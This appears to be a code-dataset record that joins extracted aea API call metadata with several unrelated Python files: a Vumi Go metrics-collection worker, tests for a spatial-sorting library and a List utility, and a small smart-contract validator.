transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (5991, 6046), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6060, 6154), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (6069, 6154), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6243, 6316), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), 
"('price', int, False, 'The price of the goods in the currency.')\n", (6252, 6316), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6330, 6423), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (6339, 6423), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6512, 6598), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (6521, 6598), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7385, 7430), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (7394, 7430), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7444, 7489), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""3"""', 'int', '(True)', '"""A good on offer."""'], {}), "('3', int, True, 'A good on offer.')\n", (7453, 7489), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7503, 7567), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (7512, 7567), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7581, 7675), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', 
'"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (7590, 7675), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7764, 7837), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (7773, 7837), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7851, 7944), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (7860, 7944), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8033, 8119), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (8042, 8119), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9356, 9401), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (9365, 9401), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9415, 9479), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (9424, 9479), False, 'from aea.helpers.search.models import Attribute, Constraint, 
ConstraintType, DataModel, Description\n'), ((9493, 9587), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (9502, 9587), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9676, 9749), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (9685, 9749), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9763, 9856), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (9772, 9856), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9945, 10031), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (9954, 10031), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8294, 8317), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['""">="""', '(1)'], {}), "('>=', 1)\n", (8308, 8317), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8348, 8371), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['""">="""', '(1)'], {}), "('>=', 1)\n", (8362, 8371), False, 'from aea.helpers.search.models import Attribute, Constraint, 
ConstraintType, DataModel, Description\n'), ((8410, 8441), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'ledger_id'], {}), "('==', ledger_id)\n", (8424, 8441), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8482, 8515), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'currency_id'], {}), "('==', currency_id)\n", (8496, 8515), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10206, 10229), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['""">="""', '(1)'], {}), "('>=', 1)\n", (10220, 10229), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10268, 10299), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'ledger_id'], {}), "('==', ledger_id)\n", (10282, 10299), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10340, 10373), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'currency_id'], {}), "('==', currency_id)\n", (10354, 10373), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n')] |
# -*- test-case-name: go.vumitools.tests.test_metrics_worker -*-
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.task import LoopingCall
from vumi import log
from vumi.worker import BaseWorker
from vumi.config import ConfigInt, ConfigError
from vumi.persist.model import Manager
from go.vumitools.api import VumiApi, VumiApiCommand, ApiCommandPublisher
from go.vumitools.app_worker import GoWorkerConfigMixin, GoWorkerMixin
class GoMetricsWorkerConfig(BaseWorker.CONFIG_CLASS, GoWorkerConfigMixin):
    """At the start of each `metrics_interval` the :class:`GoMetricsWorker`
    collects a list of all active conversations and distributes them
    into `metrics_interval / metrics_granularity` buckets.
    Immediately afterwards and then after each `metrics_granularity`
    interval, the metrics worker sends a `collect_metrics` command to each
    of the conversations in the current bucket until all buckets have been
    processed.
    Once all buckets have been processed, active conversations are
    collected again and the cycle repeats.
    """
    metrics_interval = ConfigInt(
        "How often (in seconds) the worker should send `collect_metrics` "
        "commands for each conversation. Must be an integer multiple of "
        "`metrics_granularity`.",
        default=300,
        static=True)
    metrics_granularity = ConfigInt(
        "How often (in seconds) the worker should process a bucket of "
        "conversations.",
        default=5,
        static=True)
    def post_validate(self):
        """Reject configs where `metrics_interval` is not an exact multiple
        of `metrics_granularity` (the buckets would not divide evenly)."""
        if (self.metrics_interval % self.metrics_granularity != 0):
            raise ConfigError("Metrics interval must be an integer multiple"
                              " of metrics granularity.")
class GoMetricsWorker(BaseWorker, GoWorkerMixin):
    """A metrics collection worker for Go applications.
    This worker operates by finding all conversations that require metrics
    collection and sending commands to the relevant application workers to
    trigger the actual metrics.
    """
    CONFIG_CLASS = GoMetricsWorkerConfig
    worker_name = 'go_metrics'
    @inlineCallbacks
    def setup_worker(self):
        """Create the Vumi API handles and command publisher, then start the
        bucket-processing loop at `metrics_granularity` intervals."""
        yield self._go_setup_worker()
        config = self.get_static_config()
        self.vumi_api = yield VumiApi.from_config_async({
            'riak_manager': config.riak_manager,
            'redis_manager': config.redis_manager,
        })
        self.redis = self.vumi_api.redis
        self.command_publisher = yield self.start_publisher(
            ApiCommandPublisher)
        # Buckets are processed round-robin, one bucket per granularity tick.
        self._current_bucket = 0
        self._num_buckets = (
            config.metrics_interval // config.metrics_granularity)
        self._buckets = dict((i, []) for i in range(self._num_buckets))
        # Cache of conversation key -> application worker name so each
        # conversation only has to be loaded once.
        self._conversation_workers = {}
        self._looper = LoopingCall(self.metrics_loop_func)
        self._looper.start(config.metrics_granularity)
    @inlineCallbacks
    def teardown_worker(self):
        """Stop the processing loop and release Redis/worker resources."""
        if self._looper.running:
            self._looper.stop()
        yield self.redis.close_manager()
        yield self._go_teardown_worker()
    def bucket_for_conversation(self, conv_key):
        """Map a conversation key to a bucket index (hash modulo buckets)."""
        return hash(conv_key) % self._num_buckets
    @inlineCallbacks
    def populate_conversation_buckets(self):
        """Distribute all active conversations across the buckets.

        Runs at the start of each `metrics_interval` cycle.
        """
        account_keys = yield self.find_account_keys()
        num_conversations = 0
        # We deliberately serialise this. We don't want to hit the datastore
        # too hard for metrics.
        for account_key in account_keys:
            conv_keys = yield self.find_conversations_for_account(account_key)
            num_conversations += len(conv_keys)
            for conv_key in conv_keys:
                bucket = self.bucket_for_conversation(conv_key)
                if conv_key not in self._conversation_workers:
                    # TODO: Clear out archived conversations
                    user_api = self.vumi_api.get_user_api(account_key)
                    conv = yield user_api.get_wrapped_conversation(conv_key)
                    self._conversation_workers[conv_key] = conv.worker_name
                worker_name = self._conversation_workers[conv_key]
                self._buckets[bucket].append(
                    (account_key, conv_key, worker_name))
        log.info(
            "Scheduled metrics commands for %d conversations in %d accounts."
            % (num_conversations, len(account_keys)))
    @inlineCallbacks
    def process_bucket(self, bucket):
        """Send a metrics command for every conversation in *bucket*,
        emptying the bucket as it goes."""
        convs, self._buckets[bucket] = self._buckets[bucket], []
        for account_key, conversation_key, worker_name in convs:
            yield self.send_metrics_command(
                account_key, conversation_key, worker_name)
    def increment_bucket(self):
        """Advance to the next bucket, wrapping back to zero."""
        self._current_bucket += 1
        self._current_bucket %= self._num_buckets
    @inlineCallbacks
    def metrics_loop_func(self):
        """LoopingCall body: refill buckets at the start of a cycle, then
        process the current bucket and advance."""
        if self._current_bucket == 0:
            yield self.populate_conversation_buckets()
        yield self.process_bucket(self._current_bucket)
        self.increment_bucket()
    def setup_connectors(self):
        # This worker consumes no transport messages; nothing to connect.
        pass
    @Manager.calls_manager
    def find_account_keys(self):
        """Return all account keys minus those listed in the
        'disabled_metrics_accounts' Redis set."""
        keys = yield self.vumi_api.account_store.users.all_keys()
        disabled_keys = yield self.redis.smembers('disabled_metrics_accounts')
        returnValue(set(keys) - set(disabled_keys))
    def find_conversations_for_account(self, account_key):
        """Return the running conversations for *account_key* (delegates to
        the account's conversation store)."""
        user_api = self.vumi_api.get_user_api(account_key)
        return user_api.conversation_store.list_running_conversations()
    def send_metrics_command(self, account_key, conversation_key, worker_name):
        """Publish a `collect_metrics` API command for one conversation."""
        cmd = VumiApiCommand.command(
            worker_name,
            'collect_metrics',
            conversation_key=conversation_key,
            user_account_key=account_key)
        return self.command_publisher.publish_message(cmd)
| [
"twisted.internet.task.LoopingCall",
"vumi.config.ConfigError",
"vumi.config.ConfigInt",
"go.vumitools.api.VumiApi.from_config_async",
"go.vumitools.api.VumiApiCommand.command"
] | [((1151, 1349), 'vumi.config.ConfigInt', 'ConfigInt', (['"""How often (in seconds) the worker should send `collect_metrics` commands for each conversation. Must be an integer multiple of `metrics_granularity`."""'], {'default': '(300)', 'static': '(True)'}), "(\n 'How often (in seconds) the worker should send `collect_metrics` commands for each conversation. Must be an integer multiple of `metrics_granularity`.'\n , default=300, static=True)\n", (1160, 1349), False, 'from vumi.config import ConfigInt, ConfigError\n'), ((1414, 1536), 'vumi.config.ConfigInt', 'ConfigInt', (['"""How often (in seconds) the worker should process a bucket of conversations."""'], {'default': '(5)', 'static': '(True)'}), "(\n 'How often (in seconds) the worker should process a bucket of conversations.'\n , default=5, static=True)\n", (1423, 1536), False, 'from vumi.config import ConfigInt, ConfigError\n'), ((2872, 2907), 'twisted.internet.task.LoopingCall', 'LoopingCall', (['self.metrics_loop_func'], {}), '(self.metrics_loop_func)\n', (2883, 2907), False, 'from twisted.internet.task import LoopingCall\n'), ((5702, 5826), 'go.vumitools.api.VumiApiCommand.command', 'VumiApiCommand.command', (['worker_name', '"""collect_metrics"""'], {'conversation_key': 'conversation_key', 'user_account_key': 'account_key'}), "(worker_name, 'collect_metrics', conversation_key=\n conversation_key, user_account_key=account_key)\n", (5724, 5826), False, 'from go.vumitools.api import VumiApi, VumiApiCommand, ApiCommandPublisher\n'), ((1679, 1767), 'vumi.config.ConfigError', 'ConfigError', (['"""Metrics interval must be an integer multiple of metrics granularity."""'], {}), "(\n 'Metrics interval must be an integer multiple of metrics granularity.')\n", (1690, 1767), False, 'from vumi.config import ConfigInt, ConfigError\n'), ((2330, 2437), 'go.vumitools.api.VumiApi.from_config_async', 'VumiApi.from_config_async', (["{'riak_manager': config.riak_manager, 'redis_manager': config.redis_manager}"], {}), 
"({'riak_manager': config.riak_manager,\n 'redis_manager': config.redis_manager})\n", (2355, 2437), False, 'from go.vumitools.api import VumiApi, VumiApiCommand, ApiCommandPublisher\n')] |
import sys
from os.path import exists
from unittest.mock import patch
import numpy as np # type: ignore
import pytest
from despace.spatial_sort import SortND
sys.path.append("..")
# NOTE(review): presumably added so the package is importable when running
# the tests from the tests directory — verify before removing.
# 1-D input and its expected ascending order.
coords_1d = np.array([1.0, 0.1, 1.5, -0.3, 0.0])
sorted_coords_1d = np.array([-0.3, 0.0, 0.1, 1.0, 1.5])
# 2-D points (built column-wise, hence the transpose) and expected order.
coords_2d = np.array(
    [[1.0, 0.1, 1.5, -0.3, 0.0], [1.5, 0.2, 1.3, -0.1, 0.7]]
).transpose()
sorted_coords_2d = np.array(
    [[-0.3, -0.1], [0.0, 0.7], [0.1, 0.2], [1.0, 1.5], [1.5, 1.3]]
)
# 3-D points (column-wise) and expected order.
coords_3d = np.array(
    [[1.2, 0.0, 1.7, -0.4, 0.1], [1.4, 0.9, 1.0, -0.6, 0.3], [2.0, 0.0, 1.4, -0.2, 0.2]]
).transpose()
sorted_coords_3d = np.array(
    [
        [-0.4, -0.6, -0.2],
        [0.0, 0.9, 0.0],
        [0.1, 0.3, 0.2],
        [1.7, 1.0, 1.4],
        [1.2, 1.4, 2.0],
    ]
)
# A 4x4 integer grid plus its expected Morton (Z-order) and Hilbert-curve
# orderings.
grid_16 = np.array([[i, j] for i in range(4) for j in range(4)])
morton_grid_16 = np.array(
    [
        [0, 0],
        [0, 1],
        [1, 0],
        [1, 1],
        [0, 2],
        [0, 3],
        [1, 2],
        [1, 3],
        [2, 0],
        [2, 1],
        [3, 0],
        [3, 1],
        [2, 2],
        [2, 3],
        [3, 2],
        [3, 3],
    ]
)
hilbert_grid_16 = np.array(
    [
        [0, 0],
        [1, 0],
        [1, 1],
        [0, 1],
        [0, 2],
        [0, 3],
        [1, 3],
        [1, 2],
        [2, 2],
        [2, 3],
        [3, 3],
        [3, 2],
        [3, 1],
        [2, 1],
        [2, 0],
        [3, 0],
    ]
)
def test_sort():
    """Exercise SortND both via the explicit .sort() call and via __call__."""
    cases = (
        (coords_1d, sorted_coords_1d),
        (coords_2d, sorted_coords_2d),
        (coords_3d, sorted_coords_3d),
    )
    # Init and call the sort method.
    for coords, expected in cases:
        assert np.array_equal(SortND(coords).sort(), expected)
    with pytest.raises(ValueError):
        SortND(np.random.rand(2, 2, 2))
    # Init once and call the instance directly.
    s = SortND()
    for coords, expected in cases:
        assert np.array_equal(s(coords), expected)
    with pytest.raises(ValueError):
        s(np.random.rand(2, 2, 2))
    # Morton ordering.
    assert np.array_equal(SortND(sort_type="Morton")(grid_16), morton_grid_16)
    # Hilbert ordering.
    hilbert = SortND(sort_type="Hilbert")
    assert np.array_equal(hilbert(grid_16), hilbert_grid_16)
    with pytest.raises(NotImplementedError):
        hilbert(np.random.rand(5, 3))
@patch("matplotlib.pyplot.show")
def test_plot(mock_show):
    """Plot each dataset, both showing and saving to the expected files."""
    s = SortND()
    # Show plots for every dimensionality.
    for coords in (coords_1d, coords_2d, coords_3d):
        s(coords)
        assert s.plot(save_plot=False)
        assert s.plot(save_plot=False, show_plot=True)
    # Save plots under the default and an explicit file name.
    for coords, default_name, custom_name in (
        (coords_1d, "1D_5.png", "test_1d.png"),
        (coords_2d, "2D_5.png", "test_2d.png"),
        (coords_3d, "3D_5.png", "test_3d.png"),
    ):
        s(coords)
        s.plot(save_plot=True)
        assert exists(default_name)
        s.plot(save_plot=True, file_name=custom_name)
        assert exists(custom_name)
| [
"os.path.exists",
"numpy.random.rand",
"numpy.array",
"pytest.raises",
"unittest.mock.patch",
"sys.path.append",
"despace.spatial_sort.SortND"
] | [((162, 183), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (177, 183), False, 'import sys\n'), ((197, 233), 'numpy.array', 'np.array', (['[1.0, 0.1, 1.5, -0.3, 0.0]'], {}), '([1.0, 0.1, 1.5, -0.3, 0.0])\n', (205, 233), True, 'import numpy as np\n'), ((253, 289), 'numpy.array', 'np.array', (['[-0.3, 0.0, 0.1, 1.0, 1.5]'], {}), '([-0.3, 0.0, 0.1, 1.0, 1.5])\n', (261, 289), True, 'import numpy as np\n'), ((407, 479), 'numpy.array', 'np.array', (['[[-0.3, -0.1], [0.0, 0.7], [0.1, 0.2], [1.0, 1.5], [1.5, 1.3]]'], {}), '([[-0.3, -0.1], [0.0, 0.7], [0.1, 0.2], [1.0, 1.5], [1.5, 1.3]])\n', (415, 479), True, 'import numpy as np\n'), ((631, 734), 'numpy.array', 'np.array', (['[[-0.4, -0.6, -0.2], [0.0, 0.9, 0.0], [0.1, 0.3, 0.2], [1.7, 1.0, 1.4], [\n 1.2, 1.4, 2.0]]'], {}), '([[-0.4, -0.6, -0.2], [0.0, 0.9, 0.0], [0.1, 0.3, 0.2], [1.7, 1.0, \n 1.4], [1.2, 1.4, 2.0]])\n', (639, 734), True, 'import numpy as np\n'), ((866, 1009), 'numpy.array', 'np.array', (['[[0, 0], [0, 1], [1, 0], [1, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 0], [2,\n 1], [3, 0], [3, 1], [2, 2], [2, 3], [3, 2], [3, 3]]'], {}), '([[0, 0], [0, 1], [1, 0], [1, 1], [0, 2], [0, 3], [1, 2], [1, 3], [\n 2, 0], [2, 1], [3, 0], [3, 1], [2, 2], [2, 3], [3, 2], [3, 3]])\n', (874, 1009), True, 'import numpy as np\n'), ((1164, 1307), 'numpy.array', 'np.array', (['[[0, 0], [1, 0], [1, 1], [0, 1], [0, 2], [0, 3], [1, 3], [1, 2], [2, 2], [2,\n 3], [3, 3], [3, 2], [3, 1], [2, 1], [2, 0], [3, 0]]'], {}), '([[0, 0], [1, 0], [1, 1], [0, 1], [0, 2], [0, 3], [1, 3], [1, 2], [\n 2, 2], [2, 3], [3, 3], [3, 2], [3, 1], [2, 1], [2, 0], [3, 0]])\n', (1172, 1307), True, 'import numpy as np\n'), ((2406, 2437), 'unittest.mock.patch', 'patch', (['"""matplotlib.pyplot.show"""'], {}), "('matplotlib.pyplot.show')\n", (2411, 2437), False, 'from unittest.mock import patch\n'), ((1507, 1524), 'despace.spatial_sort.SortND', 'SortND', (['coords_1d'], {}), '(coords_1d)\n', (1513, 1524), False, 'from despace.spatial_sort 
import SortND\n'), ((1587, 1604), 'despace.spatial_sort.SortND', 'SortND', (['coords_2d'], {}), '(coords_2d)\n', (1593, 1604), False, 'from despace.spatial_sort import SortND\n'), ((1667, 1684), 'despace.spatial_sort.SortND', 'SortND', (['coords_3d'], {}), '(coords_3d)\n', (1673, 1684), False, 'from despace.spatial_sort import SortND\n'), ((1853, 1861), 'despace.spatial_sort.SortND', 'SortND', ([], {}), '()\n', (1859, 1861), False, 'from despace.spatial_sort import SortND\n'), ((2134, 2160), 'despace.spatial_sort.SortND', 'SortND', ([], {'sort_type': '"""Morton"""'}), "(sort_type='Morton')\n", (2140, 2160), False, 'from despace.spatial_sort import SortND\n'), ((2243, 2270), 'despace.spatial_sort.SortND', 'SortND', ([], {'sort_type': '"""Hilbert"""'}), "(sort_type='Hilbert')\n", (2249, 2270), False, 'from despace.spatial_sort import SortND\n'), ((2472, 2480), 'despace.spatial_sort.SortND', 'SortND', ([], {}), '()\n', (2478, 2480), False, 'from despace.spatial_sort import SortND\n'), ((2881, 2899), 'os.path.exists', 'exists', (['"""1D_5.png"""'], {}), "('1D_5.png')\n", (2887, 2899), False, 'from os.path import exists\n'), ((2963, 2984), 'os.path.exists', 'exists', (['"""test_1d.png"""'], {}), "('test_1d.png')\n", (2969, 2984), False, 'from os.path import exists\n'), ((3040, 3058), 'os.path.exists', 'exists', (['"""2D_5.png"""'], {}), "('2D_5.png')\n", (3046, 3058), False, 'from os.path import exists\n'), ((3122, 3143), 'os.path.exists', 'exists', (['"""test_2d.png"""'], {}), "('test_2d.png')\n", (3128, 3143), False, 'from os.path import exists\n'), ((3199, 3217), 'os.path.exists', 'exists', (['"""3D_5.png"""'], {}), "('3D_5.png')\n", (3205, 3217), False, 'from os.path import exists\n'), ((3281, 3302), 'os.path.exists', 'exists', (['"""test_3d.png"""'], {}), "('test_3d.png')\n", (3287, 3302), False, 'from os.path import exists\n'), ((303, 369), 'numpy.array', 'np.array', (['[[1.0, 0.1, 1.5, -0.3, 0.0], [1.5, 0.2, 1.3, -0.1, 0.7]]'], {}), '([[1.0, 0.1, 1.5, -0.3, 0.0], 
[1.5, 0.2, 1.3, -0.1, 0.7]])\n', (311, 369), True, 'import numpy as np\n'), ((499, 597), 'numpy.array', 'np.array', (['[[1.2, 0.0, 1.7, -0.4, 0.1], [1.4, 0.9, 1.0, -0.6, 0.3], [2.0, 0.0, 1.4, -\n 0.2, 0.2]]'], {}), '([[1.2, 0.0, 1.7, -0.4, 0.1], [1.4, 0.9, 1.0, -0.6, 0.3], [2.0, 0.0,\n 1.4, -0.2, 0.2]])\n', (507, 597), True, 'import numpy as np\n'), ((1748, 1773), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1761, 1773), False, 'import pytest\n'), ((2045, 2070), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2058, 2070), False, 'import pytest\n'), ((2335, 2369), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (2348, 2369), False, 'import pytest\n'), ((1790, 1813), 'numpy.random.rand', 'np.random.rand', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (1804, 1813), True, 'import numpy as np\n'), ((2082, 2105), 'numpy.random.rand', 'np.random.rand', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (2096, 2105), True, 'import numpy as np\n'), ((2381, 2401), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)'], {}), '(5, 3)\n', (2395, 2401), True, 'import numpy as np\n')] |
import json
def is_valid(smc_type):
    """Return True if *smc_type* is a supported smart-contract type.

    A membership test replaces the original repetitive if/elif chain that
    compared against each supported type in turn.
    """
    return smc_type in ('vmt', 'flt', 'nfl')
def parse_vmt(contract):
    """Validate a 'vmt' contract: 'value', 'seller' and 'product' required.

    Bug fix: the original wrapped ``contract.get(...)`` calls in
    try/except, but ``dict.get`` never raises for a missing key (it
    returns None), so missing fields were silently accepted.  Check key
    presence explicitly instead.
    """
    try:
        return all(key in contract for key in ('value', 'seller', 'product'))
    except TypeError:
        # *contract* is not a mapping / does not support membership tests.
        return False
def parse_flt(contract):
    """Validate an 'flt' contract.

    Requires 'value', 'seller', 'product' and a 'land-id' mapping that
    contains the plot key '1'.

    Bug fix: ``dict.get`` inside try/except only detected a missing
    'land-id' (via the chained ``None.get``); the flat fields were never
    actually validated because ``get`` returns None rather than raising.
    """
    try:
        required = ('value', 'seller', 'product', 'land-id')
        if not all(key in contract for key in required):
            return False
        # 'land-id' must itself contain plot '1'.
        return '1' in contract['land-id']
    except TypeError:
        # Not a mapping, or 'land-id' does not support membership tests.
        return False
def parse_nfl(contract):
    """Validate an 'nfl' contract.

    The original was a verbatim copy of parse_flt and shared its schema
    ('value', 'seller', 'product', 'land-id' containing plot '1'); that
    schema is preserved, but the validation is made real — ``dict.get``
    inside try/except never raises for missing flat keys, so they were
    previously never checked.
    """
    try:
        required = ('value', 'seller', 'product', 'land-id')
        if not all(key in contract for key in required):
            return False
        # 'land-id' must itself contain plot '1'.
        return '1' in contract['land-id']
    except TypeError:
        # Not a mapping, or 'land-id' does not support membership tests.
        return False
def parse_type(smc_type, contract):
    """Dispatch *contract* to the validator for *smc_type*.

    Returns False for unknown types — the original if/elif chain fell
    through and implicitly returned None, which callers comparing
    ``is True`` happened to tolerate but which was never an explicit
    contract.
    """
    parsers = {
        'vmt': parse_vmt,
        'flt': parse_flt,
        'nfl': parse_nfl,
    }
    parser = parsers.get(smc_type)
    if parser is None:
        return False
    return parser(contract)
def parse_contract(fp):
    """Load a smart contract from the file-like object *fp* and validate it.

    Returns the contract dict on success, False otherwise.

    Bug fix: the parameter was previously named ``json``, shadowing the
    imported ``json`` module, so ``json.load(json)`` tried to call
    ``.load`` on the argument itself and the function could never
    succeed.  The bare ``except`` is also narrowed to the errors this
    step can actually raise.
    """
    try:
        contract = json.load(fp)  # Tries to load the contract
        smc_type = contract.get('type')
    except (ValueError, AttributeError, OSError):
        return False
    if is_valid(smc_type) is False:  # validate if the contract type is valid
        return False
    if parse_type(smc_type=smc_type, contract=contract) is True:
        return contract
    else:
        return False
| [
"json.load"
] | [((1197, 1212), 'json.load', 'json.load', (['json'], {}), '(json)\n', (1206, 1212), False, 'import json\n')] |
from hamcrest import *
from nose.tools import eq_
from mc import List, Some, Nothing,add
def test_list_map():
    doubled = List([1, 2, 3]).map(lambda n: n * 2)
    eq_(doubled, [2, 4, 6])
def test_list_flat_map():
    expanded = List([1, 3]).flat_map(lambda n: (n * 2, n * 4))
    eq_(expanded, [2, 4, 6, 12])
def test_list_filter():
    below_two = List([1, 2, 3]).filter(lambda n: n < 2)
    eq_(below_two, [1])
def test_list_fold():
    product = List([1, 2, 3]).fold(lambda acc, n: acc * n, 1)
    eq_(product, 6)
def test_list_group_by():
    by_parity = List([1, 2, 3, 4, 5, 6]).group_by(lambda n: n % 2)
    eq_(by_parity, {1: [1, 3, 5], 0: [2, 4, 6]})
def test_list_mk_string():
    rendered = List([5, 6, 7]).mk_string("_", "<", ">")
    eq_(rendered, "<5_6_7>")
def test_list_to_dict():
    mapping = List([(5, 6), (7, 8)]).to_dict()
    eq_(mapping, {5: 6, 7: 8})
def test_list_to_set():
    round_tripped = List([5, 6, 7]).to_set().to_list()
    eq_(round_tripped, List([5, 6, 7]))
def test_list_multiproc_map():
    # Worker function executed in subprocesses by multiproc_map.
    def double(value):
        return value * 2
    eq_(List([1, 2, 3]).multiproc_map(double), [2, 4, 6])
def test_list_foreach():
    seen = {}
    def record(value):
        seen[value] = value
    List([9, 8, 7]).foreach(record)
    eq_(set(seen.keys()), {9, 8, 7})
def test_list_should_flat_map_iterables():
    # flat_map must accept any iterable result, including sets.
    flattened = List([1, 2]).flat_map(lambda n: {n, n * 2, n * 3})
    assert_that(flattened, contains_inanyorder(1, 2, 3, 2, 4, 6))
def test_list_reduce_should_return_nothing_for_empty_list():
    result = List([]).reduce(lambda x, y: x)
    assert_that(result, equal_to(Nothing()))
def test_list_reduce_should_aggregate_values():
    total = List([1, 2, 3]).reduce(lambda x, y: x + y)
    assert_that(total, equal_to(Some(6)))
def test_list_addition():
    combined = List([1, 2]) + List(["3", 4])
    assert_that(combined, equal_to(List([1, 2, "3", 4])))
def test_zip_with_idx():
    indexed = List(["A", "C", "D"]).zip_with_idx()
    assert_that(indexed, equal_to(List([(0, "A"), (1, "C"), (2, "D")])))
def test_list_pick_one():
    # More than one element, or none at all, must raise.
    assert_that(calling(List(['1', '2']).pick_one), raises(AssertionError))
    assert_that(calling(List([]).pick_one), raises(AssertionError))
    # Exactly one element is returned as-is.
    assert_that(List([1]).pick_one(), equal_to(1))
def test_accumulate():
    """accumulate folds `add` over the list starting from the seed value.

    Bug fix: this test was defined twice verbatim; the second definition
    shadowed the first, so only a single copy is kept.
    """
    assert_that(List([1, 2, 3]).accumulate(add, 2), equal_to(8))
def test_count():
    assert_that(List([1, 2, 3]).count(), equal_to(3))
def test_zip():
    pairs = List([1, 2]).zip([3, 4])
    assert_that(pairs, equal_to([(1, 3), (2, 4)]))
def test_zip_shift():
    # The default shift of 1 pairs each element with its successor.
    assert_that(List([1, 2]).zip_shift(), equal_to([(1, 2)]))
